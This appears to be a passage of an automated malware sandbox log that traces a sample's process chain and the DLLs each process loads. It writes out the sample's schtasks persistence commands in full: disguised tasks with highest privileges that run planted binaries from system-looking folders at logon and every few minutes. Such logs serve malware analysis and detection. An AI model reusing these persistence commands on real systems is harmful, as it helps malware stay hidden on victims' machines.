Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 6 /tr "'C:\Windows\Containers\serviced\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory Compression" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Memory CompressionM" /sc MINUTE /mo 13 /tr "'C:\Program Files\7-Zip\Lang\Memory Compression.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdf" /sc ONLOGON /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "uXGucUKOPdfu" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows NT\uXGucUKOPdf.exe'" /rl HIGHEST /f
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\surrogateserverreviewsession\dasHost.exe C:\surrogateserverreviewsession\dasHost.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown	Process created: C:\surrogateserverreviewsession\dasHost.exe C:\surrogateserverreviewsession\dasHost.exe
Source: unknown	Process created: C:\Program Files\7-Zip\Lang\Memory Compression.exe "C:\Program Files\7-Zip\Lang\Memory Compression.exe"
Source: unknown	Process created: C:\Program Files\7-Zip\Lang\Memory Compression.exe "C:\Program Files\7-Zip\Lang\Memory Compression.exe"
Source: unknown	Process created: C:\Program Files\Windows NT\uXGucUKOPdf.exe "C:\Program Files\Windows NT\uXGucUKOPdf.exe"
Source: unknown	Process created: C:\Program Files\Windows NT\uXGucUKOPdf.exe "C:\Program Files\Windows NT\uXGucUKOPdf.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\surrogateserverreviewsession\dasHost.exe "C:\surrogateserverreviewsession\dasHost.exe"
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\surrogateserverreviewsession\pmMvwz3lY7qlA.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\surrogateserverreviewsession\cAWYZg0ZdjD2dKs6hjKja7TASB4qz.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\surrogateserverreviewsession\Agentserver.exe "C:\surrogateserverreviewsession\Agentserver.exe"	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cAOdivXVvC.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\surrogateserverreviewsession\dasHost.exe "C:\surrogateserverreviewsession\dasHost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CPYEzG7VGh.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: version.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\Agentserver.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: mscoree.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: kernel.appcore.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: version.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: uxtheme.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: windows.storage.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: wldp.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: profapi.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: cryptsp.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: rsaenh.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: cryptbase.dll
Source: C:\surrogateserverreviewsession\dasHost.exe	Section loaded: sspicli.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: mscoree.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: apphelp.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: version.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\7-Zip\Lang\Memory Compression.exe	Section loaded: windows.storage.dll
